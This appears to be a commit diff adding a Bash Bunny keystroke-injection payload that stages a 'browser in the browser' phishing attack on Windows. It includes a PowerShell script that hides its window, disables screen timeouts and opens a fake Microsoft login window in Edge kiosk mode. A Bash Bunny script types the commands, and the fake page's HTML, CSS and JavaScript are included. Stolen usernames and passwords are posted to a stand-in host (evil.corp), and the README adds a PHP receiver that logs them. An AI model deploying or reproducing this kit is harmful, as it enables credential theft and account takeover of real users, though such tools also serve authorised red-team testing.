Add "Microsoft Windows" Browser in the Browser

payloads/library/phishing/windows_browser-in-the-browser/README.md

@@ -0,0 +1,95 @@
+# "Microsoft Windows" Browser in the Browser (BitB)
+
+- Title:         "Microsoft Windows" Browser in the Browser (BitB)
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Phishing
+
+## Description
+
+1) Hide "PowerShell" window.
+2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+4) Copies and hides the phishing folder in the current user's directory.
+5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+# Choose "dark" or "light"
+#
+readonly BITB_THEME="dark"
+
+# Title of the window
+#
+readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
+
+# URL in the address bar
+#
+readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
+
+# Content of the navigation window
+#
+readonly BITB_TEMPLATE="microsoft-account.html"
+
+# Destination of the form data
+#
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+
+
+```
+
+Example of code for the data receiver :
+```php
+<?php
+
+if (
+    $_SERVER['REQUEST_METHOD'] === 'POST'
+) {
+
+    $remote_addr = (string) $_SERVER['REMOTE_ADDR'];
+    $user_agent = (string) $_SERVER['HTTP_USER_AGENT'];
+    $username_password = (string) implode(',', $_POST);
+
+    /*
+        touch ./aGFrNQ_loot.log
+        chown www-data:www-data ./aGFrNQ_loot.log
+    */
+    $loot = fopen('aGFrNQ_loot.log', 'a');
+    fwrite($loot, "##\n");
+    fwrite($loot, $remote_addr . "\n");
+    fwrite($loot, $user_agent . "\n");
+    fwrite($loot, $username_password . "\n");
+    fwrite($loot, "##\n");
+    fclose($loot);
+
+}
+
+http_response_code(302);
+header('Location: https://hak5.org/');
+exit;
+
+?>
+```
+
+## Screenshots
+
+>
+> Dark Theme
+>
+
+![bitb-dark](./readme_files/bitb-dark.png)
+
+>
+> Light Theme
+>
+
+![bitb-light](./readme_files/bitb-light.png)

payloads/library/phishing/windows_browser-in-the-browser/payload.ps1

@@ -0,0 +1,55 @@
+#
+# Author:       TW-D
+# Version:      1.0
+#
+
+param (
+    [string] $BITB_THEME,
+    [string] $BITB_TITLE,
+    [string] $BITB_URL,
+    [string] $BITB_TEMPLATE,
+    [string] $DROP_URL
+)
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ($BITB_THEME -And $BITB_TITLE -And $BITB_URL -And $BITB_TEMPLATE -And $DROP_URL) {
+
+    # Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+    #
+    (powercfg /Change monitor-timeout-ac 0); (powercfg /Change monitor-timeout-dc 0)
+
+    # Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+    #
+    (powercfg /Change standby-timeout-ac 0); (powercfg /Change standby-timeout-dc 0)
+
+    # Copies and hides the phishing folder in the current user's directory.
+    #
+    $random_name = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8  | % {[char] $_} ) )
+    $phishing_path = "${HOME}\${random_name}\"
+    Copy-Item -Path ".\phishing_files\" -Destination "${phishing_path}" -Recurse
+    (Get-Item "${phishing_path}" -Force).Attributes = "Hidden"
+
+    # Builds the configuration file for the phishing page.
+    #
+    "const BITB_THEME = '${BITB_THEME}';" | Out-File -FilePath "${phishing_path}TMP.js"
+    "const BITB_TITLE = '${BITB_TITLE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+    "const BITB_URL = '${BITB_URL}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+    "const BITB_TEMPLATE = '${BITB_TEMPLATE}';" | Out-File -FilePath "${phishing_path}TMP.js" -Append
+
+    # Updating the destination of the form data.
+    #
+    (Get-Content "${phishing_path}templates\${BITB_TEMPLATE}") -Replace "--DROP_URL--", "${DROP_URL}" | Set-Content "${phishing_path}templates\${BITB_TEMPLATE}"
+
+    # Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+    #
+    $phishing_path = ($phishing_path -Replace '[\\/]', '/')
+    & "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --app="file:///${phishing_path}index.html" --kiosk --kiosk-idle-timeout-minutes=0 --edge-kiosk-type=fullscreen --no-first-run
+
+}

payloads/library/phishing/windows_browser-in-the-browser/payload.txt

@@ -0,0 +1,103 @@
+#!/bin/bash
+#
+# Title:            "Microsoft Windows" Browser in the Browser (BitB)
+#
+# Description:     
+#                   1) Hide "PowerShell" window.
+#                   2) Change "monitor-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   3) Change "standby-timeout (AC and DC)" at NEVER with "powercfg" utility.
+#                   4) Copies and hides the phishing folder in the current user's directory.
+#                   5) Full screen opening of the phishing HTML page using "Microsoft Edge" in kiosk mode.
+#                   6) The username/password will be sent by HTTP POST to the URL specified in the "DROP_URL" constant.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Target:           Microsoft Windows
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# NOTE
+# ===============
+# Microsoft Edge is required on the target machine.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+# Choose "dark" or "light"
+#
+readonly BITB_THEME="dark"
+
+# Title of the window
+#
+readonly BITB_TITLE="Outlook - free personal email and calendar from Microsoft"
+
+# URL in the address bar
+#
+readonly BITB_URL="https://login.live.com/login.srf?wa=wsignin1.0&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%253a%252f%252foutlook.live.com%252fowa%252f"
+
+# Content of the navigation window
+#
+readonly BITB_TEMPLATE="microsoft-account.html"
+
+# Destination of the form data
+#
+readonly DROP_URL="http://evil.corp:8080/drop.php?ZXZpbC5jb3Jw.png"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 8000
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 4000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3000
+
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BITB_THEME \"${BITB_THEME}\" -BITB_TITLE \"${BITB_TITLE}\" -BITB_URL \"${BITB_URL}\" -BITB_TEMPLATE \"${BITB_TEMPLATE}\" -DROP_URL \"${DROP_URL}\""
+Q ENTER
+Q DELAY 3000
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/css/main.css

@@ -0,0 +1,40 @@
+#draggable {
+    font-family: "Segoe UI Light" !important;
+}
+
+#microsoft-logo {
+    height: 40px;
+}
+
+#title-text {
+    margin-left: 5px;
+}
+
+#minimize {
+    font-size: 20px;
+}
+
+#maximize {
+    font-size: 30px;
+}
+
+#container-minimize:hover, #container-maximize:hover {
+    opacity: 0.5;
+}
+
+#container-exit:hover {
+    background-color: red;
+}
+
+#exit {
+    font-size: 20px;
+}
+
+#ssl-logo {
+    height: 40px;
+}
+
+#phishing-iframe {
+    width: 100%;
+    height: 75vh;
+}

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/actions.js

@@ -0,0 +1,19 @@
+var draggable;
+draggable = document.querySelector('#draggable');
+
+$('#draggable').draggable();
+
+document.querySelector('#container-minimize').onclick = function() {
+    draggable.classList.remove('w-75');
+    draggable.classList.add('w-50');
+}
+
+document.querySelector('#container-maximize').onclick = function() {
+    draggable.classList.remove('w-50');
+    draggable.classList.add('w-75');
+}
+
+document.querySelector('#container-exit').onclick = function() {
+    draggable.style.display = 'none';
+    setTimeout(function() { location.reload();	}, 2000);
+}

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/assets/js/dispatch.js

@@ -0,0 +1,17 @@
+var theme;
+
+switch (BITB_THEME) {
+    case 'dark':
+        theme = ' bg-dark text-white';
+        break;
+    case 'light':
+        theme = ' bg-light text-dark';
+        break;
+    default:
+        theme = ' bg-dark text-white';
+}
+
+document.querySelectorAll('.row').forEach((row) => (row.className += theme));
+document.querySelector('#title-text').innerText = BITB_TITLE;
+document.querySelector('#url-input').value = BITB_URL;
+document.querySelector('#phishing-iframe').src = ('./templates/' + BITB_TEMPLATE);

payloads/library/phishing/windows_browser-in-the-browser/phishing_files/index.html

@@ -0,0 +1,46 @@
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+        <meta charset="UTF-8" />
+        <meta name="viewport" content="width=device-width, initial-scale=1" />
+        <link rel="stylesheet" type="text/css" href="./assets/css/main.css?version=1.0.0" />
+        <link rel="stylesheet" type="text/css" href="./assets/framework/bootstrap.min.css?version=5.1.3" />
+    </head>
+    <body>
+        <main class="container w-50 mt-4 shadow" id="draggable">
+            <div class="row p-3 text-center rounded-top">
+                <div class="col-1 align-self-center">
+                    <img id="microsoft-logo" src="./assets/img/logo.svg" alt="" />
+                </div>
+                <div class="col-8 align-self-center text-start">
+                    <div class="fw-bold" id="title-text"></div>
+                </div>
+                <div class="col-1 align-self-center pt-3" id="container-minimize">
+                    <div id="minimize">&#8212;</div>
+                </div>
+                <div class="col-1 align-self-center p-3" id="container-maximize">
+                    <div id="maximize">□</div>
+                </div>
+                <div class="col-1 align-self-center p-3" id="container-exit">
+                    <div id="exit">X</div>
+                </div>
+            </div>
+            <div class="row p-3 text-center">
+                <div class="col-1 align-self-center">
+                    <img id="ssl-logo" src="./assets/img/ssl.svg" alt="" />
+                </div>
+                <div class="col-11 align-self-center">
+                    <input class="form-control" type="text" id="url-input" disabled />
+                </div>
+            </div>
+            <div>
+                <iframe id="phishing-iframe" frameBorder="0"></iframe>
+            </div>
+        </main>
+        <script type="text/javascript" src="./assets/libraries/jquery-3.6.0.min.js?version=3.6.0"></script>
+        <script type="text/javascript" src="./assets/libraries/jquery-ui.min.js?version=1.13.0"></script>
+        <script type="text/javascript" src="./assets/js/actions.js?version=1.0.0"></script>
+        <script type="text/javascript" src="./TMP.js?version=1.0.0"></script>
+        <script type="text/javascript" src="./assets/js/dispatch.js?version=1.0.0"></script>
+    </body>
+</html>